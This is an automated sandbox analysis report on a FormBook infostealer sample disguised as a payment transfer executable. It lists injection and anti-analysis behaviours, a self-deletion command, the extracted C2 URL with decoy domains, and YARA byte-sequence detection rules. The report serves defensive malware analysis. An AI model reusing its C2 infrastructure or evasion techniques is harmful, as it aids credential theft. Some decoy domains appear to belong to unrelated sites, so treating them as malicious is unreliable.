Play interactive tour

Edit tour

Analysis Report Payment Transfer Copy of $274,876.00 for the invoice shipments.exe

Overview

General Information

Sample Name:	Payment Transfer Copy of $274,876.00 for the invoice shipments.exe
Analysis ID:	356535
MD5:	5f1c9c4a7bc24c3d39a5a3834ba7bb8e
SHA1:	0e9a21a75675c636438f50d90bb5f7ec9a689275
SHA256:	5d5d64a87a5d888443e8d7a25046922fa4a39fe5952a45635dd66321e616bb14
Tags:	exeFormbook
Most interesting Screenshot:

Detection

FormBook

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Found malware configuration

Malicious sample detected (through community Yara rule)

Multi AV Scanner detection for submitted file

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)

System process connects to network (likely due to code injection or exploit)

Yara detected AntiVM_3

Yara detected FormBook

.NET source code contains potential unpacker

.NET source code contains very large strings

C2 URLs / IPs found in malware configuration

Initial sample is a PE file and has a suspicious name

Injects a PE file into a foreign processes

Machine Learning detection for sample

Maps a DLL or memory area into another process

Modifies the context of a thread in another process (thread injection)

Modifies the prolog of user mode functions (user mode inline hooks)

Queues an APC in another process (thread injection)

Sample uses process hollowing technique

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Tries to detect virtualization through RDTSC time measurements

Antivirus or Machine Learning detection for unpacked file

Checks if the current process is being debugged

Contains functionality for execution timing, often used to detect debuggers

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Contains functionality to call native functions

Contains functionality to read the PEB

Contains long sleeps (>= 3 min)

Creates a DirectInput object (often for capturing keystrokes)

Creates a process in suspended mode (likely to inject code)

Creates processes with suspicious names

Detected potential crypto function

Enables debug privileges

Found inlined nop instructions (likely shell or obfuscated code)

Found potential string decryption / allocating functions

HTTP GET or POST without a user agent

IP address seen in connection with other malware

Internet Provider seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

Queries the volume information (name, serial number etc) of a device

Sample execution stops while process was sleeping (likely an evasion)

Sample file is different than original file name gathered from version info

Uses 32bit PE files

Uses code obfuscation techniques (call, push, ret)

Yara signature match

Classification

Startup

System is w10x64

Payment Transfer Copy of $274,876.00 for the invoice shipments.exe (PID: 6512 cmdline: 'C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe' MD5: 5F1C9C4A7BC24C3D39A5A3834BA7BB8E)

Payment Transfer Copy of $274,876.00 for the invoice shipments.exe (PID: 6840 cmdline: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe MD5: 5F1C9C4A7BC24C3D39A5A3834BA7BB8E)

explorer.exe (PID: 3388 cmdline: MD5: AD5296B280E8F522A8A897C96BAB0E1D)

explorer.exe (PID: 6224 cmdline: C:\Windows\SysWOW64\explorer.exe MD5: 166AB1B9462E5C1D6D18EC5EC0B6A5F7)

cmd.exe (PID: 4188 cmdline: /c del 'C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe' MD5: F3BDBE3BB6F734E357235F4D5898582D)

conhost.exe (PID: 1636 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)

cleanup

Malware Configuration

Threatname: FormBook

{"C2 list": ["www.jaemagreci.com/blr/"], "decoy": ["cvmjqcid.com", "cubskw.com", "carbeloy.com", "lucascolterneal.com", "robertlainstrom.com", "long9000.com", "drtconseils.com", "keptus.com", "mediamonkeyhouse.com", "outletmihotel.com", "exchangemailboxrepair.com", "kanaai.com", "mountshastajerky.com", "thepettybox.com", "sweetpopntreatz.com", "wpweasel.com", "plumbersinauckland.com", "sevdaduragi.com", "gesunde-ordnung.com", "10751wilshire801.com", "brandmkttx.net", "yoshiyama-potager.com", "na230.com", "kittyninja.net", "eurythmy.net", "circlecitydesign.com", "thesleepinn.com", "olgadalila.com", "happyaiper.com", "supplierdurian.site", "simplymcs.com", "ug-storecards.com", "gannahealing.com", "ginamoney.com", "emilyadkinsonrealtor.com", "tablatiffin.com", "laughinggrassfarm.com", "thebriartowns.com", "youplus.website", "soheilvaseghi.com", "prodhealth.site", "bltck.com", "zomapa.com", "hcssgy.com", "simplyloveoccasions.com", "mdglitzallstars.com", "rck.xyz", "stanchilo.com", "avadl.pro", "astursuites.com", "whowetrust.com", "easpipe.com", "ortopediagalvao.com", "wellhealt.com", "destinyhouseacton.com", "lazyturtletikibar.com", "online-verifieren.net", "jasa-software.com", "tenager365.com", "atgiven.icu", "recette-originale.com", "danielleandnic.com", "kathrynbaierling.com", "emmaxbellecandleco.com"]}

Yara Overview

Memory Dumps

Source	Rule	Description	Author	Strings
00000004.00000002.274205933.0000000000400000.00000040.00000001.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
00000004.00000002.274205933.0000000000400000.00000040.00000001.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x98e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x9b62:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x15685:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x15171:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x15787:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x158ff:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0xa57a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x143ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xb273:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x1b327:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1c32a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000004.00000002.274205933.0000000000400000.00000040.00000001.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x18409:$sqlite3step: 68 34 1C 7B E1 0x1851c:$sqlite3step: 68 34 1C 7B E1 0x18438:$sqlite3text: 68 38 2A 90 C5 0x1855d:$sqlite3text: 68 38 2A 90 C5 0x1844b:$sqlite3blob: 68 53 D8 7F 8C 0x18573:$sqlite3blob: 68 53 D8 7F 8C
00000004.00000002.274647874.0000000000B30000.00000040.00000001.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
00000004.00000002.274647874.0000000000B30000.00000040.00000001.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x98e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x9b62:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x15685:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x15171:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x15787:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x158ff:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0xa57a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x143ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xb273:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x1b327:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1c32a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000004.00000002.274647874.0000000000B30000.00000040.00000001.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x18409:$sqlite3step: 68 34 1C 7B E1 0x1851c:$sqlite3step: 68 34 1C 7B E1 0x18438:$sqlite3text: 68 38 2A 90 C5 0x1855d:$sqlite3text: 68 38 2A 90 C5 0x1844b:$sqlite3blob: 68 53 D8 7F 8C 0x18573:$sqlite3blob: 68 53 D8 7F 8C
00000009.00000002.743334604.0000000000750000.00000004.00000001.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
00000009.00000002.743334604.0000000000750000.00000004.00000001.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x98e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x9b62:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x15685:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x15171:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x15787:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x158ff:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0xa57a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x143ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xb273:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x1b327:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1c32a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000009.00000002.743334604.0000000000750000.00000004.00000001.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x18409:$sqlite3step: 68 34 1C 7B E1 0x1851c:$sqlite3step: 68 34 1C 7B E1 0x18438:$sqlite3text: 68 38 2A 90 C5 0x1855d:$sqlite3text: 68 38 2A 90 C5 0x1844b:$sqlite3blob: 68 53 D8 7F 8C 0x18573:$sqlite3blob: 68 53 D8 7F 8C
00000009.00000002.746271126.0000000004850000.00000040.00000001.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
00000009.00000002.746271126.0000000004850000.00000040.00000001.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x98e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x9b62:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x15685:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x15171:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x15787:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x158ff:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0xa57a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x143ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xb273:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x1b327:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1c32a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000009.00000002.746271126.0000000004850000.00000040.00000001.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x18409:$sqlite3step: 68 34 1C 7B E1 0x1851c:$sqlite3step: 68 34 1C 7B E1 0x18438:$sqlite3text: 68 38 2A 90 C5 0x1855d:$sqlite3text: 68 38 2A 90 C5 0x1844b:$sqlite3blob: 68 53 D8 7F 8C 0x18573:$sqlite3blob: 68 53 D8 7F 8C
00000000.00000002.237553429.0000000002A11000.00000004.00000001.sdmp	JoeSecurity_AntiVM_3	Yara detected AntiVM_3	Joe Security
00000009.00000002.745639709.0000000003090000.00000040.00000001.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
00000009.00000002.745639709.0000000003090000.00000040.00000001.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x98e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x9b62:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x15685:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x15171:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x15787:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x158ff:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0xa57a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x143ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xb273:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x1b327:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1c32a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000009.00000002.745639709.0000000003090000.00000040.00000001.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x18409:$sqlite3step: 68 34 1C 7B E1 0x1851c:$sqlite3step: 68 34 1C 7B E1 0x18438:$sqlite3text: 68 38 2A 90 C5 0x1855d:$sqlite3text: 68 38 2A 90 C5 0x1844b:$sqlite3blob: 68 53 D8 7F 8C 0x18573:$sqlite3blob: 68 53 D8 7F 8C
00000004.00000002.274608670.0000000000B00000.00000040.00000001.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
00000004.00000002.274608670.0000000000B00000.00000040.00000001.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x98e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x9b62:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x15685:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x15171:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x15787:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x158ff:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0xa57a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x143ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xb273:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x1b327:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1c32a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000004.00000002.274608670.0000000000B00000.00000040.00000001.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x18409:$sqlite3step: 68 34 1C 7B E1 0x1851c:$sqlite3step: 68 34 1C 7B E1 0x18438:$sqlite3text: 68 38 2A 90 C5 0x1855d:$sqlite3text: 68 38 2A 90 C5 0x1844b:$sqlite3blob: 68 53 D8 7F 8C 0x18573:$sqlite3blob: 68 53 D8 7F 8C
00000000.00000002.237926912.0000000003A19000.00000004.00000001.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
00000000.00000002.237926912.0000000003A19000.00000004.00000001.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x283d88:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x284002:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x2b03a8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x2b0622:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x28fb25:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x2bc145:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x28f611:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x2bbc31:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x28fc27:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x2bc247:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x28fd9f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x2bc3bf:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x284a1a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x2b103a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x28e88c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0x2baeac:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0x285713:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x2b1d33:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x2957c7:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x2c1de7:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x2967ca:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000000.00000002.237926912.0000000003A19000.00000004.00000001.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x2928a9:$sqlite3step: 68 34 1C 7B E1 0x2929bc:$sqlite3step: 68 34 1C 7B E1 0x2beec9:$sqlite3step: 68 34 1C 7B E1 0x2befdc:$sqlite3step: 68 34 1C 7B E1 0x2928d8:$sqlite3text: 68 38 2A 90 C5 0x2929fd:$sqlite3text: 68 38 2A 90 C5 0x2beef8:$sqlite3text: 68 38 2A 90 C5 0x2bf01d:$sqlite3text: 68 38 2A 90 C5 0x2928eb:$sqlite3blob: 68 53 D8 7F 8C 0x292a13:$sqlite3blob: 68 53 D8 7F 8C 0x2bef0b:$sqlite3blob: 68 53 D8 7F 8C 0x2bf033:$sqlite3blob: 68 53 D8 7F 8C
Process Memory Space: Payment Transfer Copy of $274,876.00 for the invoice shipments.exe PID: 6512	JoeSecurity_AntiVM_3	Yara detected AntiVM_3	Joe Security
Click to see the 18 entries

Unpacked PEs

Source	Rule	Description	Author	Strings
4.2.Payment Transfer Copy of $274,876.00 for the invoice shipments.exe.400000.0.unpack	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
4.2.Payment Transfer Copy of $274,876.00 for the invoice shipments.exe.400000.0.unpack	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x8ae8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x8d62:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x14885:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x14371:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x14987:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x14aff:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x977a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x135ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xa473:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x1a527:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1b52a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
4.2.Payment Transfer Copy of $274,876.00 for the invoice shipments.exe.400000.0.unpack	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x17609:$sqlite3step: 68 34 1C 7B E1 0x1771c:$sqlite3step: 68 34 1C 7B E1 0x17638:$sqlite3text: 68 38 2A 90 C5 0x1775d:$sqlite3text: 68 38 2A 90 C5 0x1764b:$sqlite3blob: 68 53 D8 7F 8C 0x17773:$sqlite3blob: 68 53 D8 7F 8C
0.2.Payment Transfer Copy of $274,876.00 for the invoice shipments.exe.3b619d0.3.raw.unpack	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
0.2.Payment Transfer Copy of $274,876.00 for the invoice shipments.exe.3b619d0.3.raw.unpack	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x13b3b8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x13b632:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x1679d8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x167c52:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x147155:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x173775:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x146c41:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x173261:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x147257:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x173877:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x1473cf:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x1739ef:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x13c04a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x16866a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x145ebc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0x1724dc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0x13cd43:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x169363:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x14cdf7:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x179417:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x14ddfa:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
0.2.Payment Transfer Copy of $274,876.00 for the invoice shipments.exe.3b619d0.3.raw.unpack	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x149ed9:$sqlite3step: 68 34 1C 7B E1 0x149fec:$sqlite3step: 68 34 1C 7B E1 0x1764f9:$sqlite3step: 68 34 1C 7B E1 0x17660c:$sqlite3step: 68 34 1C 7B E1 0x149f08:$sqlite3text: 68 38 2A 90 C5 0x14a02d:$sqlite3text: 68 38 2A 90 C5 0x176528:$sqlite3text: 68 38 2A 90 C5 0x17664d:$sqlite3text: 68 38 2A 90 C5 0x149f1b:$sqlite3blob: 68 53 D8 7F 8C 0x14a043:$sqlite3blob: 68 53 D8 7F 8C 0x17653b:$sqlite3blob: 68 53 D8 7F 8C 0x176663:$sqlite3blob: 68 53 D8 7F 8C
0.2.Payment Transfer Copy of $274,876.00 for the invoice shipments.exe.3bb65f0.2.raw.unpack	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
0.2.Payment Transfer Copy of $274,876.00 for the invoice shipments.exe.3bb65f0.2.raw.unpack	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0xe6798:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0xe6a12:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x112db8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x113032:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0xf2535:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x11eb55:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0xf2021:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x11e641:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0xf2637:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x11ec57:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0xf27af:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x11edcf:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0xe742a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x113a4a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0xf129c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0x11d8bc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xe8123:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x114743:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0xf81d7:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1247f7:$sequence_8: 3C 54 74 04 3C 74 75 F4 0xf91da:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
0.2.Payment Transfer Copy of $274,876.00 for the invoice shipments.exe.3bb65f0.2.raw.unpack	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0xf52b9:$sqlite3step: 68 34 1C 7B E1 0xf53cc:$sqlite3step: 68 34 1C 7B E1 0x1218d9:$sqlite3step: 68 34 1C 7B E1 0x1219ec:$sqlite3step: 68 34 1C 7B E1 0xf52e8:$sqlite3text: 68 38 2A 90 C5 0xf540d:$sqlite3text: 68 38 2A 90 C5 0x121908:$sqlite3text: 68 38 2A 90 C5 0x121a2d:$sqlite3text: 68 38 2A 90 C5 0xf52fb:$sqlite3blob: 68 53 D8 7F 8C 0xf5423:$sqlite3blob: 68 53 D8 7F 8C 0x12191b:$sqlite3blob: 68 53 D8 7F 8C 0x121a43:$sqlite3blob: 68 53 D8 7F 8C
4.2.Payment Transfer Copy of $274,876.00 for the invoice shipments.exe.400000.0.raw.unpack	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
4.2.Payment Transfer Copy of $274,876.00 for the invoice shipments.exe.400000.0.raw.unpack	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x98e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x9b62:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x15685:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x15171:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x15787:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x158ff:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0xa57a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x143ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xb273:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x1b327:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1c32a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
4.2.Payment Transfer Copy of $274,876.00 for the invoice shipments.exe.400000.0.raw.unpack	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x18409:$sqlite3step: 68 34 1C 7B E1 0x1851c:$sqlite3step: 68 34 1C 7B E1 0x18438:$sqlite3text: 68 38 2A 90 C5 0x1855d:$sqlite3text: 68 38 2A 90 C5 0x1844b:$sqlite3blob: 68 53 D8 7F 8C 0x18573:$sqlite3blob: 68 53 D8 7F 8C
0.2.Payment Transfer Copy of $274,876.00 for the invoice shipments.exe.2a94cf8.1.raw.unpack	JoeSecurity_AntiVM_3	Yara detected AntiVM_3	Joe Security
Click to see the 8 entries

Sigma Overview

No Sigma rule has matched

Signature Overview

Click to jump to signature section

Show All Signature Results

AV Detection:

Found malware configuration

Show sources

Source: 0.2.Payment Transfer Copy of $274,876.00 for the invoice shipments.exe.3b619d0.3.raw.unpack

Malware Configuration Extractor: FormBook {"C2 list": ["www.jaemagreci.com/blr/"], "decoy": ["cvmjqcid.com", "cubskw.com", "carbeloy.com", "lucascolterneal.com", "robertlainstrom.com", "long9000.com", "drtconseils.com", "keptus.com", "mediamonkeyhouse.com", "outletmihotel.com", "exchangemailboxrepair.com", "kanaai.com", "mountshastajerky.com", "thepettybox.com", "sweetpopntreatz.com", "wpweasel.com", "plumbersinauckland.com", "sevdaduragi.com", "gesunde-ordnung.com", "10751wilshire801.com", "brandmkttx.net", "yoshiyama-potager.com", "na230.com", "kittyninja.net", "eurythmy.net", "circlecitydesign.com", "thesleepinn.com", "olgadalila.com", "happyaiper.com", "supplierdurian.site", "simplymcs.com", "ug-storecards.com", "gannahealing.com", "ginamoney.com", "emilyadkinsonrealtor.com", "tablatiffin.com", "laughinggrassfarm.com", "thebriartowns.com", "youplus.website", "soheilvaseghi.com", "prodhealth.site", "bltck.com", "zomapa.com", "hcssgy.com", "simplyloveoccasions.com", "mdglitzallstars.com", "rck.xyz", "stanchilo.com", "avadl.pro", "astursuites.com", "whowetrust.com", "easpipe.com", "ortopediagalvao.com", "wellhealt.com", "destinyhouseacton.com", "lazyturtletikibar.com", "online-verifieren.net", "jasa-software.com", "tenager365.com", "atgiven.icu", "recette-originale.com", "danielleandnic.com", "kathrynbaierling.com", "emmaxbellecandleco.com"]}

Multi AV Scanner detection for submitted file

Show sources

Source: Payment Transfer Copy of $274,876.00 for the invoice shipments.exe	Virustotal: Detection: 25%			Perma Link
Source: Payment Transfer Copy of $274,876.00 for the invoice shipments.exe	ReversingLabs: Detection: 27%

Yara detected FormBook

Show sources

Source: Yara match	File source: 00000004.00000002.274205933.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.274647874.0000000000B30000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.743334604.0000000000750000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.746271126.0000000004850000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.745639709.0000000003090000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.274608670.0000000000B00000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.237926912.0000000003A19000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 4.2.Payment Transfer Copy of $274,876.00 for the invoice shipments.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.Payment Transfer Copy of $274,876.00 for the invoice shipments.exe.3b619d0.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.Payment Transfer Copy of $274,876.00 for the invoice shipments.exe.3bb65f0.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.Payment Transfer Copy of $274,876.00 for the invoice shipments.exe.400000.0.raw.unpack, type: UNPACKEDPE

Machine Learning detection for sample

Show sources

Source: Payment Transfer Copy of $274,876.00 for the invoice shipments.exe

Joe Sandbox ML: detected

Source: 4.2.Payment Transfer Copy of $274,876.00 for the invoice shipments.exe.400000.0.unpack

Avira: Label: TR/Crypt.ZPACK.Gen

Compliance:

Uses 32bit PE files

Show sources

Source: Payment Transfer Copy of $274,876.00 for the invoice shipments.exe

